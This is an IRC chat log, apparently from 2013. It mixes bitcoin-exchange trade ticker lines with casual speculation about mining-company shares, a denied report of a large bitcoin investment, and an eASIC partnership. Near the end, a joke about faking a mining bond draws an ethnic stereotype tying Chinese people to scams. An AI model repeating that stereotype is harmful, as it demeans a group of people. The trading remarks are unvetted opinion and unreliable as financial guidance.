price really moved much though Aug 05 16:55:22 Laboin hit .00105 Aug 05 16:55:25 it *could* also be that there was a deal in the works but not finalized and it got leaked by an insider. Aug 05 16:55:28 AMC touched into the 3s Aug 05 16:55:38 big *could* Aug 05 16:55:42 Idk the deal never really made sense Aug 05 16:55:42 at which point everyone denies so they can continue negotiating Aug 05 16:55:44 but yeah, things like that are always possible Aug 05 16:55:47 tat.am hit around .0036 Aug 05 16:55:54 oh good point Aug 05 16:55:54 [BTCTC] [ASICMINER-PT] 2 @ 4.049 = 8.098 BTC [+] Aug 05 16:55:55 [BTCTC] [ASICMINER-PT] 2 @ 4.05 = 8.1 BTC [+] Aug 05 16:55:56 The bigs hit .0038 Aug 05 16:56:07 could have been trying to lower mining share prices Aug 05 16:56:11 I agree, it doesn't make sense unless they are flat out betting on BTC in a major way that can't be done just buying it directly. Aug 05 16:56:18 well... Aug 05 16:56:19 yeah Aug 05 16:56:24 buy the coins Aug 05 16:56:27 you can invest in mining to back into position Aug 05 16:56:27 then do the deal Aug 05 16:56:29 without moving price Aug 05 16:56:34 These guys arent idiots Aug 05 16:56:43 you say that - but try and buy $100M of BTC without moving the price. Aug 05 16:56:46 similar to buying calls, rather than buying the underlying Aug 05 16:56:50 [BTCTC] [CB.IDIFF-O] 2500 @ 0.0079 = 19.75 BTC Aug 05 16:56:50 I get it Aug 05 16:56:57 that is why buying the mining company makes more sense for a large player Aug 05 16:57:33 fair enough - I'm not saying it's a real story and I'd question certainly the amount of $ invested Aug 05 16:57:33 Im saying these guys nwould do both Aug 05 16:57:56 if it were real, then it'd come with tons of performance plateaus that would need to be met. Aug 05 16:58:19 it wasn't the first time that kinda wrong mining news were published Aug 05 16:58:32 but the last time it was the bitcoinmagazine Aug 05 16:58:42 with the 500 th article Aug 05 16:59:03 [BTCTC] [LABCOIN] 8 @ 0.001579 = 0.0126 BTC [-] Aug 05 16:59:04 at a point where the number of parcels was already very well known Aug 05 16:59:04 [BTCTC] [LABCOIN] 155 @ 0.00163 = 0.2527 BTC [+] Aug 05 16:59:09 yeah, i expect better from the WSJ when announcing any $200M deal - forget BTC Aug 05 16:59:16 true Aug 05 16:59:27 easier and easier to game media outlets i think Aug 05 16:59:35 also Aug 05 16:59:37 i think the author is a bitcoin user Aug 05 16:59:45 the reasons i was skeptical, is because they didn't use the company name Aug 05 16:59:48 bitsyncom Aug 05 16:59:53 who makes avalon Aug 05 16:59:57 and just relyed on bitexaminer Aug 05 17:00:10 which is probably an important detail, they referred to the company as "avalon" which it is not Aug 05 17:00:27 yifu never commented, so... Aug 05 17:00:43 also, all it would take would be $20M to buy a majority stake - the value is just way too high. Aug 05 17:00:58 the real question is: is bitcoinexaminer well.. sloppy or was it planed? Aug 05 17:01:04 yes Aug 05 17:01:11 it was "planned" by someone Aug 05 17:01:18 even if Joe Lewis thinks that BTC is going to $10K then there's no need to throw around that kind of money Aug 05 17:01:19 but was it them? i doubt it Aug 05 17:01:22 yea sure Aug 05 17:01:37 but was bitex knowingly invovled? Aug 05 17:01:56 did they knew, that it was fake? Aug 05 17:02:34 because the link to the 2011 avalon venture deal is on the forums for hours now Aug 05 17:02:50 and i assume someone from bitex should have seen it till now Aug 05 17:02:57 but yet no reaction Aug 05 17:04:33 [BTCTC] [LABCOIN] 1 @ 0.001543 BTC [-] Aug 05 17:04:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.03999 = 0.12 BTC [+] Aug 05 17:04:44 [BTCTC] [TAT.ASICMINER] 21 @ 0.04 = 0.84 BTC [+] Aug 05 17:06:14 what was the reason for your sell or did you just bought more? Aug 05 17:06:26 nvm Aug 05 17:06:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.03915 BTC [-] Aug 05 17:07:01 [BTCTC] [BTCGARDEN] 60 @ 0.01609 = 0.9654 BTC [+] Aug 05 17:07:04 [BTCTC] [ASICMINER-PT] 2 @ 4.047 = 8.094 BTC [-] Aug 05 17:10:28 [BTCTC] [ACTIVEMINING] 5 @ 0.005409 = 0.027 BTC [-] Aug 05 17:11:32 [BTCTC] [CB.IDIFF-O] 49 @ 0.0079 = 0.3871 BTC Aug 05 17:11:51 [BTCTC] [DMS.MINING] 5 @ 0.007699 = 0.0385 BTC [-] Aug 05 17:14:11 [BTCTC] [DMS.MINING] 20 @ 0.007369 = 0.1474 BTC [-] Aug 05 17:14:50 [BTCTC] [DMS.SELLING] 6 @ 0.02154 = 0.1292 BTC [+] Aug 05 17:16:42 ;;nethash Aug 05 17:16:43 331020.078547 Aug 05 17:17:46 [HAVELOCK] [XBOND] 4 @ 0.0010499 = 0.0042 BTC [-] Aug 05 17:17:52 [BTCTC] [TAT.ASICMINER] 9 @ 0.03915 = 0.3524 BTC [-] Aug 05 17:17:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.03915 BTC [-] Aug 05 17:17:54 [BTCTC] [TAT.ASICMINER] 16 @ 0.03915 = 0.6264 BTC [-] Aug 05 17:18:07 [BTCTC] [LABCOIN] 1 @ 0.001628 BTC [+] Aug 05 17:18:19 [BTCTC] [ASICMINER-PT] 1 @ 4.047 BTC [-] Aug 05 17:18:24 ;;estimate Aug 05 17:18:25 Next difficulty estimate | 47147020.3486 based on data since last change | 46242265.1584 based on data for last three days Aug 05 17:18:26 [HAVELOCK] [XBOND] 3 @ 0.0010499 = 0.0031 BTC [-] Aug 05 17:18:34 ;;bcstats Aug 05 17:18:36 Current Blocks: 250371 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1628 blocks | Next Difficulty In About: 1 week, 0 days, 23 hours, 31 minutes, and 45 seconds | Next Difficulty Estimate: 47147020.3486 | Estimated Percent Change: 26.08594 Aug 05 17:18:49 [BTCTC] [LABCOIN] 50 @ 0.001627 = 0.0814 BTC [-] Aug 05 17:19:40 [BTCTC] [LABCOIN] 500 @ 0.001628 = 0.814 BTC [+] Aug 05 17:19:41 [BTCTC] [LABCOIN] 20 @ 0.001629 = 0.0326 BTC [+] Aug 05 17:19:42 [BTCTC] [LABCOIN] 1789 @ 0.00163 = 2.9161 BTC [+] Aug 05 17:19:44 [BTCTC] [LABCOIN] 1 @ 0.001642 BTC [+] Aug 05 17:19:44 [BTCTC] [LABCOIN] 690 @ 0.001642 = 1.133 BTC [+] Aug 05 17:20:55 has anyone calculated the derivates of the hash rate and difficulty? Aug 05 17:21:10 [BTCTC] [LABCOIN] 1 @ 0.001591 BTC [-] Aug 05 17:21:24 [BTCTC] [LABCOIN] 61 @ 0.001591 = 0.0971 BTC [-] Aug 05 17:21:57 [BTCTC] [LABCOIN] 1 @ 0.001592 BTC [+] Aug 05 17:24:24 [BTCTC] [TAT.MINIGAME] 1 @ 0.000242 BTC [+] Aug 05 17:24:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.03997 = 0.1199 BTC [+] Aug 05 17:26:47 [BTCTC] [BTCGARDEN] 70 @ 0.01609 = 1.1263 BTC [+] Aug 05 17:26:48 [BTCTC] [LABCOIN] 1 @ 0.0016 BTC [+] Aug 05 17:26:50 [BTCTC] [LABCOIN] 1 @ 0.001592 BTC [-] Aug 05 17:29:41 [BTCTC] [DMS.MINING] 13 @ 0.007 = 0.091 BTC [-] Aug 05 17:29:42 [BTCTC] [DMS.MINING] 1 @ 0.007 BTC [-] Aug 05 17:29:44 [BTCTC] [DMS.MINING] 50 @ 0.007 = 0.35 BTC [-] Aug 05 17:29:45 [BTCTC] [DMS.MINING] 708 @ 0.0069 = 4.8852 BTC [-] Aug 05 17:29:59 [BTCTC] [LABCOIN] 1 @ 0.001612 BTC [+] Aug 05 17:30:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.03995 BTC [-] Aug 05 17:31:09 [BTCTC] [CB.IDIFF-O] 15 @ 0.0079 = 0.1185 BTC Aug 05 17:32:18 [BTCTC] [ASICMINER-PT] 3 @ 4.047 = 12.141 BTC [-] Aug 05 17:32:19 [BTCTC] [ASICMINER-PT] 2 @ 4.048 = 8.096 BTC [+] Aug 05 17:32:20 [BTCTC] [ASICMINER-PT] 3 @ 4.049 = 12.147 BTC [+] Aug 05 17:33:45 [BTCTC] [BTCGARDEN] 290 @ 0.01601 = 4.6429 BTC [-] Aug 05 17:33:47 [BTCTC] [BTCGARDEN] 158 @ 0.016 = 2.528 BTC [-] Aug 05 17:35:11 [BTCTC] [ACTIVEMINING] 1 @ 0.005622 BTC [+] Aug 05 17:35:52 [BTCTC] [LABCOIN] 8 @ 0.001624 = 0.013 BTC [+] Aug 05 17:36:07 [BTCTC] [DMS.MINING] 5 @ 0.007499 = 0.0375 BTC [+] Aug 05 17:36:15 [BTCTC] [LABCOIN] 500 @ 0.001633 = 0.8165 BTC [+] Aug 05 17:38:29 [BTCTC] [LABCOIN] 1 @ 0.001641 BTC [+] Aug 05 17:39:02 [BTCTC] [LABCOIN] 300 @ 0.001642 = 0.4926 BTC [+] Aug 05 17:40:55 [BTCTC] [CB.IDIFF-O] 3751 @ 0.0079 = 29.6329 BTC Aug 05 17:41:10 [MPEX] [S.MPOE] 6080 @ 0.00081905 = 4.9798 BTC [-] Aug 05 17:41:12 [MPEX] [S.MPOE] 5567 @ 0.00081948 = 4.562 BTC [+] Aug 05 17:41:15 [MPEX] [S.MPOE] 1553 @ 0.00081969 = 1.273 BTC [+] Aug 05 17:42:55 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [-] Aug 05 17:44:25 [BTCTC] [BTCGARDEN] 1 @ 0.01609 BTC [+] Aug 05 17:44:26 [BTCTC] [BTCGARDEN] 100 @ 0.01612 = 1.612 BTC [+] Aug 05 17:44:28 [BTCTC] [BTCGARDEN] 119 @ 0.01612 = 1.9183 BTC [+] Aug 05 17:44:59 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [+] Aug 05 17:46:03 [BTCTC] [TAT.MINIGAME] 4 @ 0.000242 = 0.001 BTC [+] Aug 05 17:46:30 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [+] Aug 05 17:46:53 [BTCTC] [TAT.MINIGAME] 44 @ 0.000242 = 0.0106 BTC [+] Aug 05 17:52:34 [BTCTC] [LABCOIN] 1 @ 0.001631 BTC [-] Aug 05 17:52:34 [BTCTC] [LABCOIN] 500 @ 0.001641 = 0.8205 BTC [+] Aug 05 17:52:36 [BTCTC] [LABCOIN] 1011 @ 0.001642 = 1.6601 BTC [+] Aug 05 17:52:37 [BTCTC] [LABCOIN] 68 @ 0.001649 = 0.1121 BTC [+] Aug 05 17:52:58 [BTCTC] [DMS.SELLING] 49 @ 0.02084 = 1.0212 BTC [-] Aug 05 17:53:23 [BTCTC] [ACTIVEMINING] 4 @ 0.005622 = 0.0225 BTC [+] Aug 05 17:53:53 [BTCTC] [LABCOIN] 600 @ 0.001649 = 0.9894 BTC [+] Aug 05 17:54:22 [HAVELOCK] [AM100] 6 @ 0.04 = 0.24 BTC [+] Aug 05 17:57:53 The ripple collapse continues Aug 05 17:58:58 I have a friend, a dumb one, that I've been trying to explain how much of a scam it is Aug 05 17:59:01 that and rippln Aug 05 17:59:31 [BTCTC] [BTCGARDEN] 220 @ 0.016 = 3.52 BTC [-] Aug 05 18:00:02 [BTCTC] [DMS.PURCHASE] 2000 @ 0.02824 = 56.48 BTC [+] Aug 05 18:00:36 [HAVELOCK] [LABCO] 220 @ 0.0019 = 0.418 BTC [-] Aug 05 18:00:52 [BTCTC] [BTCGARDEN] 100 @ 0.01612 = 1.612 BTC [+] Aug 05 18:02:27 [HAVELOCK] [LABCO] 780 @ 0.0019 = 1.482 BTC [-] Aug 05 18:04:07 [HAVELOCK] [XBOND] 89 @ 0.001048 = 0.0933 BTC [-] Aug 05 18:04:25 [BTCTC] [DMS.MINING] 50 @ 0.007 = 0.35 BTC [-] Aug 05 18:04:26 [BTCTC] [DMS.MINING] 292 @ 0.0069 = 2.0148 BTC [-] Aug 05 18:04:28 [BTCTC] [DMS.MINING] 1000 @ 0.0067 = 6.7 BTC [-] Aug 05 18:05:09 [BTCTC] [DMS.PURCHASE] 267 @ 0.02824 = 7.5401 BTC [+] Aug 05 18:05:11 [BTCTC] [DMS.PURCHASE] 133 @ 0.02824 = 3.7559 BTC [+] Aug 05 18:05:51 [BTCTC] [ASICMINER-PT] 2 @ 4.05 = 8.1 BTC [+] Aug 05 18:07:11 [BTCTC] [DMS.MINING] 135 @ 0.007399 = 0.9989 BTC [+] Aug 05 18:07:14 [BTCTC] [TAT.ASICMINER] 22 @ 0.03979 = 0.8754 BTC [-] Aug 05 18:07:22 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 05 18:07:41 [BTCTC] [DMS.SELLING] 45 @ 0.02154 = 0.9693 BTC [+] Aug 05 18:08:03 [BTCTC] [BTCGARDEN] 59 @ 0.01612 = 0.9511 BTC [+] Aug 05 18:08:42 [BTCTC] [BTCGARDEN] 122 @ 0.01612 = 1.9666 BTC [+] Aug 05 18:08:42 [BTCTC] [ASICMINER-PT] 2 @ 4.049 = 8.098 BTC [-] Aug 05 18:09:24 [BTCTC] [ASICMINER-PT] 5 @ 4.05 = 20.25 BTC [+] Aug 05 18:09:26 [BTCTC] [ASICMINER-PT] 3 @ 4.05 = 12.15 BTC [+] Aug 05 18:09:27 [BTCTC] [ASICMINER-PT] 1 @ 4.061 BTC [+] Aug 05 18:09:28 [BTCTC] [ASICMINER-PT] 4 @ 4.078 = 16.312 BTC [+] Aug 05 18:10:26 [HAVELOCK] [AM100] 57 @ 0.04 = 2.28 BTC [+] Aug 05 18:10:59 [HAVELOCK] [XBOND] 308 @ 0.001048 = 0.3228 BTC [-] Aug 05 18:11:40 [BTCTC] [LABCOIN] 3 @ 0.001642 = 0.0049 BTC [-] Aug 05 18:11:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.03977 = 0.1193 BTC [-] Aug 05 18:11:42 [BTCTC] [LABCOIN] 3332 @ 0.001649 = 5.4945 BTC [+] Aug 05 18:11:44 [BTCTC] [LABCOIN] 2665 @ 0.00165 = 4.3973 BTC [+] Aug 05 18:15:56 it looks like the annual dividend return on asicminer-pt is 2.5x higher than the purchase price. why doesn't everyone buy that? Aug 05 18:16:49 huh Aug 05 18:17:00 ~30% yield Aug 05 18:17:02 at 4 Aug 05 18:17:15 where you gettign 2.5X Aug 05 18:19:39 [BTCTC] [DMS.PURCHASE] 900 @ 0.02824 = 25.416 BTC [+] Aug 05 18:21:07 [BTCTC] [CB.IDIFF-O] 100 @ 0.0088 = 0.88 BTC [+] Aug 05 18:21:41 [BTCTC] [DMS.MINING] 200 @ 0.007 = 1.4 BTC [-] Aug 05 18:22:16 does the history tab est annual BTC say how much i'll get with all my shares, or the yield per share? Aug 05 18:25:36 it does have a BTC/share column Aug 05 18:26:09 oh, not that table. the est annual is per share Aug 05 18:26:10 [HAVELOCK] [AM100] 5 @ 0.0403 = 0.2015 BTC [+] Aug 05 18:26:23 [BTCTC] [CB.IDIFF-O] 250 @ 0.0089 = 2.225 BTC [+] Aug 05 18:26:26 [BTCTC] [LABCOIN] 19 @ 0.001633 = 0.031 BTC [-] Aug 05 18:27:15 [MPEX] [S.MPOE] 3300 @ 0.00081609 = 2.6931 BTC [-] Aug 05 18:27:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.03977 BTC [-] Aug 05 18:27:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.03977 = 0.1193 BTC [-] Aug 05 18:27:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.03977 = 0.2784 BTC [-] Aug 05 18:27:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.03977 = 0.1591 BTC [-] Aug 05 18:30:37 https://twitter.com/ScottWapnerCNBC/status/364370798892421120 Aug 05 18:30:40 Twitter / ScottWapnerCNBC: Spoke to Joe Lewis this morning ... Aug 05 18:30:45 'Spoke to Joe Lewis this morning who says of reported Bitcoin investment: "Completely Untrue". Tells me he's "Never heard of Phoenix Fund"' Aug 05 18:30:50 [MPEX] [S.MPOE] 2950 @ 0.00081609 = 2.4075 BTC [-] Aug 05 18:31:43 phoenix fund? Aug 05 18:31:52 [BTCTC] [LABCOIN] 1 @ 0.001628 BTC [-] Aug 05 18:33:23 is BS Aug 05 18:33:41 [BTCTC] [LABCOIN] 1 @ 0.001588 BTC [-] Aug 05 18:34:12 [BTCTC] [LABCOIN] 50 @ 0.001573 = 0.0787 BTC [-] Aug 05 18:34:14 [BTCTC] [LABCOIN] 147 @ 0.001572 = 0.2311 BTC [-] Aug 05 18:34:32 [BTCTC] [LABCOIN] 50 @ 0.001573 = 0.0787 BTC [+] Aug 05 18:34:34 [BTCTC] [LABCOIN] 88 @ 0.001572 = 0.1383 BTC [-] Aug 05 18:35:04 [BTCTC] [LABCOIN] 50 @ 0.001571 = 0.0786 BTC [-] Aug 05 18:35:05 [BTCTC] [LABCOIN] 450 @ 0.00157 = 0.7065 BTC [-] Aug 05 18:35:47 [HAVELOCK] [AM100] 3 @ 0.0403 = 0.1209 BTC [+] Aug 05 18:36:07 [BTCTC] [CB.IDIFF-O] 1 @ 0.009125 BTC [+] Aug 05 18:36:32 [BTCTC] [LABCOIN] 16 @ 0.001582 = 0.0253 BTC [+] Aug 05 18:36:35 [BTCTC] [ACTIVEMINING] 177 @ 0.005622 = 0.9951 BTC [+] Aug 05 18:37:16 [BTCTC] [TAT.ASICMINER] 20 @ 0.03995 = 0.799 BTC [+] Aug 05 18:37:54 [HAVELOCK] [AM100] 5 @ 0.0403 = 0.2015 BTC [+] Aug 05 18:39:20 [HAVELOCK] [AM100] 3 @ 0.0403 = 0.1209 BTC [+] Aug 05 18:39:33 [BTCTC] [LABCOIN] 1 @ 0.001566 BTC [-] Aug 05 18:40:05 [BTCTC] [LABCOIN] 235 @ 0.001581 = 0.3715 BTC [+] Aug 05 18:40:06 [BTCTC] [LABCOIN] 50 @ 0.001582 = 0.0791 BTC [+] Aug 05 18:40:07 [BTCTC] [LABCOIN] 16 @ 0.001583 = 0.0253 BTC [+] Aug 05 18:40:07 [BTCTC] [LABCOIN] 11 @ 0.001604 = 0.0176 BTC [+] Aug 05 18:40:09 [BTCTC] [LABCOIN] 13 @ 0.001634 = 0.0212 BTC [+] Aug 05 18:40:10 [BTCTC] [LABCOIN] 1 @ 0.001636 BTC [+] Aug 05 18:40:11 [BTCTC] [LABCOIN] 6674 @ 0.001648 = 10.9988 BTC [+] Aug 05 18:40:25 [BTCTC] [LABCOIN] 50 @ 0.001582 = 0.0791 BTC [-] Aug 05 18:42:24 [HAVELOCK] [AM100] 3 @ 0.0403 = 0.1209 BTC [+] Aug 05 18:44:23 [BTCTC] [COGNITIVE] 2 @ 0.4002 = 0.8004 BTC [+] Aug 05 18:44:25 [BTCTC] [COGNITIVE] 2 @ 0.4001 = 0.8002 BTC [-] Aug 05 18:44:26 [BTCTC] [COGNITIVE] 3 @ 0.4 = 1.2 BTC [-] Aug 05 18:44:27 http://www.easic.com/easic-announces-strategic-investment-by-seagate/ Aug 05 18:44:30 eASIC Announces Strategic Investment by Seagate | eASIC Corporation Aug 05 18:44:36 [BTCTC] [DMS.MINING] 23 @ 0.00661 = 0.152 BTC [-] Aug 05 18:44:53 yeah Aug 05 18:45:06 hasn't really spurred much attention for am Aug 05 18:45:08 amc** Aug 05 18:45:22 why would it? Aug 05 18:45:37 Cause they're doing work with ActiveMining Aug 05 18:45:48 (supposedly) Aug 05 18:46:03 I know that Aug 05 18:46:15 Yeah. They are under NDA, so until that is lifted and we can see the details I don't expect may eASIC news to make waves. Aug 05 18:46:18 they're just subcontracting asics from them. so what? Aug 05 18:46:29 No, they're making an equity investment. Aug 05 18:46:30 so tell us, does that announcement bode well or ill? I can spin it either way Aug 05 18:46:46 easics has many clients, amc isn't likely 1% of their income Aug 05 18:46:54 THat's not the point. Aug 05 18:47:10 it changes nothing Aug 05 18:47:18 could be that they needed the money/talent, could be that the seagate stuff bumps back the order for ACTM, could go either way Aug 05 18:47:40 I think they are seperate Aug 05 18:47:54 and won't get in teh way of each oter Aug 05 18:47:57 other Aug 05 18:48:20 [BTCTC] [ACTIVEMINING] 103 @ 0.005622 = 0.5791 BTC [+] Aug 05 18:48:59 [BTCTC] [ACTIVEMINING] 400 @ 0.00564 = 2.256 BTC [+] Aug 05 18:49:00 [BTCTC] [ACTIVEMINING] 457 @ 0.005695 = 2.6026 BTC [+] Aug 05 18:49:01 [BTCTC] [ACTIVEMINING] 50 @ 0.005699 = 0.285 BTC [+] Aug 05 18:49:02 [BTCTC] [ACTIVEMINING] 93 @ 0.0057 = 0.5301 BTC [+] Aug 05 18:49:06 eASIC is partnered with ActM, eASIC is shown as a strong vendor in cutting edge technology, ActM is recognized as making a profitable partnership - 28nm isn't so "ZOMG TOO FAR OFF NO WAI" anymore. Aug 05 18:49:10 OTOH, a lot of fast draw sellers from last night are going to be DRUNK today Aug 05 18:49:30 Benefits, benefits, benefits. Aug 05 18:49:30 [BTCTC] [ASICMINER-PT] 5 @ 4.1 = 20.5 BTC [+] Aug 05 18:49:31 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [+] Aug 05 18:49:32 [BTCTC] [ASICMINER-PT] 1 @ 4.12 BTC [+] Aug 05 18:49:34 [BTCTC] [ASICMINER-PT] 1 @ 4.12 BTC [+] Aug 05 18:50:33 seagate is bribing eAsic to do something that they didn't think was core to their business, that's what an equity investment usually is Aug 05 18:50:53 (unless there are financing problems, and then it's life support) Aug 05 18:51:00 [BTCTC] [LABCOIN] 1 @ 0.001594 BTC [+] Aug 05 18:51:49 in either case there is no reason to think that the Seagate announcement will directly impact the ACTM deal in any positive way, and there is a small risk of negative impact (focus shift) Aug 05 18:52:19 at best the seagate deal is irrelevant Aug 05 18:52:30 there is a positive Aug 05 18:52:38 a singular positive Aug 05 18:52:51 [BTCTC] [LABCOIN] 490 @ 0.00157 = 0.7693 BTC [-] Aug 05 18:52:54 which is? Aug 05 18:53:06 they already have 28nm, that is not new Aug 05 18:53:24 that active's partnership with easic is a good one Aug 05 18:53:31 [BTCTC] [LABCOIN] 2383 @ 0.00157 = 3.7413 BTC [-] Aug 05 18:53:45 WTH does the SEAGATE announcement have to do with the ACTM partnership? Aug 05 18:53:56 just shows the partnership value Aug 05 18:54:03 it attests to the value of the partner Aug 05 18:54:06 yes Aug 05 18:54:11 it's a Seagate <-> eAsic agreement with no ACTM to speak of Aug 05 18:54:15 correct. Aug 05 18:54:23 that's trusting seagate's due diligence process of course Aug 05 18:54:26 well if seagate (albeit not retards) contract with easics, it means it was a good choice Aug 05 18:54:26 they partnered before the agreement Aug 05 18:54:30 lol at "partenrship" Aug 05 18:54:41 ACTM <-> eAsic is an independent agreement Aug 05 18:54:41 [BTCTC] [LABCOIN] 25 @ 0.001569 = 0.0392 BTC [-] Aug 05 18:54:42 [BTCTC] [LABCOIN] 292 @ 0.00157 = 0.4584 BTC [+] Aug 05 18:54:54 eAsic is a "known good" quantity long before this deal Aug 05 18:55:07 it's a warm fuzzy for the invesotrs. Aug 05 18:55:08 investors Aug 05 18:55:09 . Aug 05 18:55:17 it's puffing up a fart Aug 05 18:55:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.03999 = 0.16 BTC [+] Aug 05 18:55:27 [BTCTC] [LABCOIN] 25 @ 0.00157 = 0.0393 BTC [+] Aug 05 18:55:37 just because there is activity in their pants, does not make it interesting Aug 05 18:56:26 (BTW, I'm positive on ACTM, just confused about relevance of the seagate thing) Aug 05 18:57:29 it's minor Aug 05 18:57:42 [BTCTC] [TAT.ASICMINER] 15 @ 0.03999 = 0.5999 BTC [+] Aug 05 18:58:18 [BTCTC] [ACTIVEMINING] 1407 @ 0.0057 = 8.0199 BTC [+] Aug 05 18:58:21 how many shares has 100TH issued? Aug 05 18:58:47 I notice they're not in the ticker here Aug 05 18:59:10 they are on picostocks, I don't really follow it Aug 05 18:59:17 scrybe Aug 05 18:59:35 it's just a reassurance thing Aug 05 18:59:45 [BTCTC] [BTC-TRADING-PT] 1 @ 0.7896 BTC [-] Aug 05 19:00:04 that active is on track Aug 05 19:00:10 ok, define what I'm supposed to be reassured of? that a long standing expert is not going to suddenly go away? Aug 05 19:00:22 and unless someone from within messes that up the company is set to do well Aug 05 19:00:35 [BTCTC] [ASICMINER-PT] 3 @ 4.12 = 12.36 BTC [+] Aug 05 19:00:37 [BTCTC] [ASICMINER-PT] 2 @ 4.14 = 8.28 BTC [+] Aug 05 19:00:54 is easic a startup? Aug 05 19:01:06 no Aug 05 19:01:33 In 1999 eASIC Corporation was founded in San Jose, California, and incorporated in Delaware by Zvi Or-Bach, the founder of Chip Express Aug 05 19:01:38 private and backed by venture capital so that's why i asked Aug 05 19:02:01 Theyre pretty big Aug 05 19:02:09 http://www.easic.com/easic-rated-third-fastest-growing-semiconductor-company-in-north-america-on-deloittes-2012-technology-fast-500/ Aug 05 19:02:23 nice Aug 05 19:02:29 [BTCTC] [BTCGARDEN] 100 @ 0.01612 = 1.612 BTC [+] Aug 05 19:02:32 [BTCTC] [BTCGARDEN] 20 @ 0.01613 = 0.3226 BTC [+] Aug 05 19:02:34 [BTCTC] [BTCGARDEN] 18 @ 0.01613 = 0.2903 BTC [+] Aug 05 19:02:35 [BTCTC] [BTCGARDEN] 212 @ 0.01614 = 3.4217 BTC [+] Aug 05 19:02:54 they are big enough that I'm wondering what the big deal is on a strategic agreement with seagate, yeah, they are that big Aug 05 19:03:13 [BTCTC] [BTCGARDEN] 1522 @ 0.016 = 24.352 BTC [-] Aug 05 19:03:16 [BTCTC] [BTCGARDEN] 1125 @ 0.016 = 18 BTC [-] Aug 05 19:03:18 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [-] Aug 05 19:03:20 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [-] Aug 05 19:03:22 [BTCTC] [BTCGARDEN] 904 @ 0.016 = 14.464 BTC [-] Aug 05 19:03:48 [BTCTC] [BTCGARDEN] 25 @ 0.01598 = 0.3995 BTC [-] Aug 05 19:04:07 [BTCTC] [BTCGARDEN] 5 @ 0.0158 = 0.079 BTC [-] Aug 05 19:04:17 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 05 19:04:26 [BTCTC] [LABCOIN] 3 @ 0.001566 = 0.0047 BTC [-] Aug 05 19:04:28 [BTCTC] [LABCOIN] 28 @ 0.001565 = 0.0438 BTC [-] Aug 05 19:05:59 [BTCTC] [LABCOIN] 13 @ 0.001565 = 0.0203 BTC [-] Aug 05 19:06:14 [HAVELOCK] [AM100] 5 @ 0.04035 = 0.2018 BTC [+] Aug 05 19:06:16 [HAVELOCK] [AM100] 6 @ 0.04035 = 0.2421 BTC [+] Aug 05 19:06:18 [BTCTC] [ACTIVEMINING] 1000 @ 0.00585 = 5.85 BTC [+] Aug 05 19:06:19 [BTCTC] [ACTIVEMINING] 100 @ 0.005888 = 0.5888 BTC [+] Aug 05 19:06:20 [BTCTC] [ACTIVEMINING] 300 @ 0.005889 = 1.7667 BTC [+] Aug 05 19:06:21 [BTCTC] [ACTIVEMINING] 394 @ 0.005938 = 2.3396 BTC [+] Aug 05 19:06:22 [BTCTC] [ACTIVEMINING] 10 @ 0.005998 = 0.06 BTC [+] Aug 05 19:06:23 [BTCTC] [ACTIVEMINING] 300 @ 0.005999 = 1.7997 BTC [+] Aug 05 19:06:25 [BTCTC] [ACTIVEMINING] 286 @ 0.005999 = 1.7157 BTC [+] Aug 05 19:06:26 I should start a Ripple Mining Bond Aug 05 19:06:26 [BTCTC] [ACTIVEMINING] 1700 @ 0.006 = 10.2 BTC [+] Aug 05 19:06:27 [BTCTC] [ACTIVEMINING] 300 @ 0.006 = 1.8 BTC [+] Aug 05 19:06:28 [BTCTC] [ACTIVEMINING] 1703 @ 0.006 = 10.218 BTC [+] Aug 05 19:06:41 o_O Aug 05 19:07:12 don't worry, I'll have pics to verify my authenticity Aug 05 19:07:17 ;;nethash Aug 05 19:07:18 346668.902354 Aug 05 19:07:20 dayum Aug 05 19:07:40 and a really nice looking forum post, so that everyone will believe me Aug 05 19:08:43 you must be chinese too Aug 05 19:09:05 Or Korean Aug 05 19:09:22 not by genetics, but with enough effort I can make that happen yeah no problem Aug 05 19:11:00 [BTCTC] [BTCGARDEN] 411 @ 0.0158 = 6.4938 BTC [-] Aug 05 19:11:02 [BTCTC] [BTCGARDEN] 300 @ 0.0156 = 4.68 BTC [-] Aug 05 19:11:02 [BTCTC] [BTCGARDEN] 5 @ 0.01554 = 0.0777 BTC [-] Aug 05 19:11:28 [BTCTC] [BTCGARDEN] 28 @ 0.01554 = 0.4351 BTC [-] Aug 05 19:11:29 [BTCTC] [BTCGARDEN] 6 @ 0.01553 = 0.0932 BTC [-] Aug 05 19:11:31 [BTCTC] [BTCGARDEN] 46 @ 0.01552 = 0.7139 BTC [-] Aug 05 19:11:55 [BTCTC] [BTCGARDEN] 4 @ 0.01552 = 0.0621 BTC [-] Aug 05 19:11:57 [BTCTC] [BTCGARDEN] 1 @ 0.01551 BTC [-] Aug 05 19:11:58 [BTCTC] [BTCGARDEN] 2 @ 0.01551 = 0.031 BTC [-] Aug 05 19:11:59 [BTCTC] [BTCGARDEN] 1 @ 0.0155 BTC [-] Aug 05 19:12:00 [BTCTC] [BTCGARDEN] 20 @ 0.0155 = 0.31 BTC [-] Aug 05 19:12:02 [BTCTC] [BTCGARDEN] 22 @ 0.01541 = 0.339 BTC [-] Aug 05 19:12:50 [BTCTC] [CB.IDIFF-O] 94 @ 0.009125 = 0.8578 BTC [+] Aug 05 19:13:13 [BTCTC] [BTCGARDEN] 30 @ 0.01541 = 0.4623 BTC [-] Aug 05 19:14:28 [BTCTC] [BTCGARDEN] 840 @ 0.01541 = 12.9444 BTC [-] Aug 05 19:15:25 